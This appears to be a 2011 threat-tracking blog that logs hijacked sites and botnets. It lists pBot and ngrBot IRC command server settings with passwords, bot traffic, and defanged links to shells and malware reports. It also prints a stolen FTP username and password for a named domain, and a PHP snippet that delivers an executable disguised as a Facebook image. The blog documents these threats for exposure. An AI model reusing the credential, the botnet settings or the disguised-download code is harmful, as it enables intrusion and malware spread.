Pages

Saturday, December 31, 2011

Botnet - pBot - irc.setan.us 

var $config = array("server"=>"irc.setan.us",
"port"=>"6667",
"pass"=>"",
"prefix"=>"|TiReX|","|MaChoo|","MaXoN|",
"maxrand"=>"7",
"chan"=>"#blocker",
"chan2"=>"#blocker",
"key"=>"bot",
"modes"=>"+ps",
"password"=>"on",
"trigger"=>".",
"hostauth"=>"110.111.112.113" // * for any hostname (remember: /setvhost takapusi.cok)
);
Posted by at 1 comment:
Labels: , , , , , ,

Friday, December 30, 2011

Owned - ngrBot - unibell.com.pe


Posted by at No comments:
Labels: , , ,

Owned - pBot - memex.mooo.com 

// shell hxxp://britishherniasociety.org/wp-content/themes/twentyten/images/headers/xxx.php
("server"=>"memex.mooo.com",  
                     "port"=>"7150",   
                     "pass"=>"jancuk",   
                     "prefix"=>"endos",   
                     "maxrand"=>"3",   
                     "chan"=>"#+kpok", 
                     "chan2"=>"#+kpok",  
                     "key"=>"senhadocanal",      
                     "modes"=>"+p",              
                     "password"=>"jancuk",           
                     "trigger"=>".",  
                     "hostauth"=>"admin.unix-ccpower.com"
Posted by at No comments:
Labels: , , , , ,

Owned - ngrBot - rockstar 

199.193.252.177 5236 : PASS ROCKR
PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to "5"
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to "5"
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 24 domain(s)
NICK n{US|XPa}entvuwe
USER entvuwe 0 0 :entvuwe
JOIN #ROCK ngrBot
JOIN #rockspread
JOIN #US
Posted by at No comments:
Labels: , , ,

Thursday, December 29, 2011

Owned - pBot - Frank_73

Posted by at No comments:
Labels: , , , ,

Saturday, December 24, 2011

Owned - rockstar - jagd-kamera.de 

// irc server !!
elperro23.net (5236)
#rockspread
#ROCK
Posted by at No comments:
Labels: , , ,

Owned - pBot - jaguari.rs.gov.br

Posted by at No comments:
Labels: , , , ,

Saturday, December 17, 2011

Owned - ngrBot - elperro23.net 




hxxp://www.virustotal.com/file-scan/report.html?id=3ca3ccdb973874d40a6a99a3bfaecab54efe55b50c1899ac9678c935e0c782e9-1324149377
Posted by at No comments:
Labels: , ,

PHP - pBot - FHI Crew

Posted by at No comments:
Labels: , , ,

Tuesday, December 13, 2011

Owned - ngrBot - alemanarts.com

Posted by at No comments:
Labels: ,

Wednesday, December 7, 2011

FTP - Stealer - ciesplimeira.org.br 

Domain : ciesplimeira.org.br
IP : 199.238.129.34 
PORT : 21
USER : ciespl
PASS : hatuw+RUpr4dU4pu
// traffic on port 21 ->
| CWD etc/..PASS h
| atuw+RUpr4dU4pu.
| .TYPE I..SYST..C
| WD etc/..PASS ha
| tuw+RUpr4dU4pu..
| TYPE I..SYST..
Posted by at No comments:
Labels: , ,

Tuesday, December 6, 2011

Owned - Malware - okprice.biz & vivitenis.com

Posted by at No comments:
Labels: ,

Monday, December 5, 2011

Owned - malware - jjpoultrys.com 

Found a Paypal phishing script into that site here is the script :)
// usa.zip Paypal phishing !
hxxp://www.sendspace.com/file/k7kycq
Posted by at No comments:
Labels: ,

Friday, December 2, 2011

Owned - Maware - newcarsnc.it 

// malware info 
hxxp://vxvault.siri-urz.net/ViriFiche.php?ID=10462
hxxp://www.threatexpert.com/report.aspx?md5=9EB8326C223D9330BD8B3924F4D71476
Posted by at No comments:
Labels: ,

Thursday, December 1, 2011

Owned - Botnet - concertnomade.com 

Session Ident: #!loco!
[14:03] * Now talking in #!loco!
[14:03] * Topic is '.m.s|.m.e fotoo :D http://www.concertnomade.com/templates/profiles.php?= '
[14:03] * Set by wd91 on Thu Dec 01 13:55:46
[14:07] * Disconnected
Posted by at No comments:
Labels: ,

OWNED - Botnet - 208.67.252.82


Owned :P 
// sample found here : 
hzzp://vxvault.siri-urz.net/ViriFiche.php?ID=10452

// spreading file profile.php?=
header('Content-disposition: attachment; filename=IMG886384737664934-JPG-www.facebook.com.exe');
header('Content-type: application/octet-stream');
readfile('qwe2');
Posted by at No comments:
Labels: ,
Subscribe to: Posts (Atom)